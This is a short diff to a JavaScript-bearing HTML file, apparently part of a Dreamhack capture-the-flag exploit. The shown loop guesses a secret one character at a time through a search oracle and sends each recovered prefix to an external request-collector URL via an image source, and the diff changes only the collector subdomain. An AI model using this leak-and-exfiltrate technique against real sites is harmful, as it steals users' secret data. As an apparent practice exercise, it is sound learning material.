--- a/static/js/test.html
+++ b/static/js/test.html
@@ -33,7 +33,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://ylpjamb.request.dreamhack.games/${secret}`;
+                    img.src = `https://oozaipv.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
